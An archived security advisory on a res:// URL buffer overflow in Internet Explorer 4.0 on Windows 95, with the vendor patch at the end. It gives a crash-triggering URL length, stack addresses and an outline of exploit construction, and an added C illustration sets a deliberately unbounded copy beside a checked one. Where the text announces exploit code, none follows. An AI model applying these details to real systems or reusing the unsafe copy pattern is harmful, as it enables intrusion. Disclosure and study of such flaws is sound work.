COMMAND
Microsoft Internet Explorer 4.0 Suite
SYSTEMS AFFECTED
Win 95
PROBLEM
DilDog from L0pht released a new L0pht Advisory, this one about IE4.
The Microsoft Internet Explorer 4.0 Suite, including all programs
supplied with it that read and/or process HTML from local machines,
intranet machines, or remote internet machines, is subject to a
buffer overflow in the HTML decoding process. The buffer overflow
can cause the application to page fault or, in the worst case, to
execute arbitrary precompiled native code.
An example goes as follows :-)):
1. Copy the supplied HTML file(s) into a location that is
accessible via the target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad man stop.
The problem here lies in the deciphering of the URL line format
itself. The base HTML library used by the Internet Explorer 4.0
Suite is affected, so the following programs are vulnerable:
- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)
This problem, because it stems from a programming flaw in the HTML
decoding system, is unaffected by the Explorer "Security Zones"
feature. In other words, if you turn on the highest security
level for the zone from where the exploit HTML is being viewed,
you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a
particular new type of URL protocol. The "res://" type of URL is
meant to allow access to a local resource embedded in a local DLL
file. This is useful for archiving entire websites into a DLL and
is not, in its truest concept, a security flaw.
For example, to read something out of the IE4.0 Tour (stored in a
DLL) try the following URL:
res://ie4tour.dll/page1-6.htm
The buffer overflow is on the actual filename specified. To crash
your machine go ahead and try res://blahblahblah ... blahblah/ in
your Internet Explorer window where the amount of 'blah' equals
265 characters.
The function that goes through the filename and validates it is
flawed on Windows 95. Without checking the length, the filename
is uppercased, concatenated with '.DLL' if it isn't there already,
and in the process, copied into a fixed size buffer.
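The flaw pattern just described, modelled in C as an added illustration (this is not L0pht's or Microsoft's code): the unbounded "uppercase, append .DLL, copy" shape next to a version that checks the final length before writing. RES_NAME_MAX (a MAX_PATH-sized 260) is an assumption; the real MSHTML buffer size is not stated in the advisory.

```c
#include <ctype.h>
#include <string.h>

/* Added illustration, not L0pht's or Microsoft's code: a toy model of the
 * res:// DLL-name handling the advisory describes. RES_NAME_MAX is an
 * assumption (MAX_PATH-sized); the real MSHTML buffer size is not known. */
#define RES_NAME_MAX 260

/* 1 if the last four characters of s are ".dll" in any case. */
static int ends_with_dll(const char *s, size_t n) {
    return n >= 4 && s[n - 4] == '.' && toupper((unsigned char)s[n - 3]) == 'D' &&
           toupper((unsigned char)s[n - 2]) == 'L' && toupper((unsigned char)s[n - 1]) == 'L';
}

/* Vulnerable shape: uppercase, append ".DLL" if missing, never ask how big
 * dst is. A name longer than dst writes past its end (the advisory's crash). */
static void normalize_unsafe(char *dst, const char *name) {
    size_t i, n = strlen(name);
    for (i = 0; i < n; i++) dst[i] = (char)toupper((unsigned char)name[i]);
    dst[n] = '\0';
    if (!ends_with_dll(name, n)) strcat(dst, ".DLL");
}

/* Hardened shape: compute the final length first and refuse the name when it,
 * the optional ".DLL" and the NUL do not fit. Returns 0 on success, -1 if rejected. */
static int normalize_safe(char *dst, size_t dstlen, const char *name) {
    size_t i, n = strlen(name);
    int add_ext = !ends_with_dll(name, n);
    if (n + (add_ext ? 4u : 0u) + 1 > dstlen) return -1;
    for (i = 0; i < n; i++) dst[i] = (char)toupper((unsigned char)name[i]);
    dst[n] = '\0';
    if (add_ext) memcpy(dst + n, ".DLL", 5);
    return 0;
}

/* 1 if the hardened version accepts name and produces want. */
static int safe_gives(const char *name, const char *want) {
    char out[RES_NAME_MAX];
    return normalize_safe(out, sizeof out, name) == 0 && strcmp(out, want) == 0;
}

/* The advisory's trigger: a DLL name of 265 characters (constructed here),
 * which the bounded version rejects instead of overrunning out[]. */
static int long_name_rejected(void) {
    char name[266], out[RES_NAME_MAX];
    memset(name, 'b', 265);
    name[265] = '\0';
    return normalize_safe(out, sizeof out, name) == -1;
}
```

The advisory's own res://ie4tour.dll example normalises to IE4TOUR.DLL either way; the difference shows only on the 265-character name, which normalize_unsafe would write past a 260-byte buffer and normalize_safe refuses.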
When constructing the exploit we want to try something useful.
Let's start with appending text of your choice to AUTOEXEC.BAT...
(note that running native code lets you do pretty much anything
you want). Note that the location of the exploit string in the
stack is very important and it varies from target application to
target application. Constructing the exploit string:
Figure out the stack location for the exploit code...
App                Loc
Internet Explorer  0x0057C144
Windows Explorer   0x0088A0F4
...
Those locations have null bytes in them, and you can't put those (or
lowercase letters, or CR/LF, or 0x07, or anything like that) in the
exploit string... but let Microsoft fix that for us. Step through
the process to see IE add that extra null character for you. Put
together what you wanna do, tack on the necessary jump addresses and
all that. That's it. Combining this with the recent P5 bug could
make for an interesting game.
Make sure you run this exploit with _internet_ explorer, _not_
regular ol' windows explorer (put it on a website and download it,
or click on the IE desktop icon (run iexplore.exe) and type the name
of the file into the URL line). It won't work otherwise!! (though it
could be made to do so). Exploit code follows:
It has been proven and demonstrated that the Pentium bug CAN and
WILL be exploited through web pages with the IE res: bug:
http://www.ee.surrey.ac.uk/Personal/L.Wood/IE4res/
Please be advised that this may hang your machine.
SOLUTION
Microsoft released a patch for the buffer overflow in Win95 with
regard to res:// type URLs:
http://www.microsoft.com/ie/security/?/ie/security/buffer.htm
The patch applies to the mshtml control, which is the core of
Internet Explorer and is what the other applications mentioned by
L0pht use. Hence the patch to IE also fixes the other apps.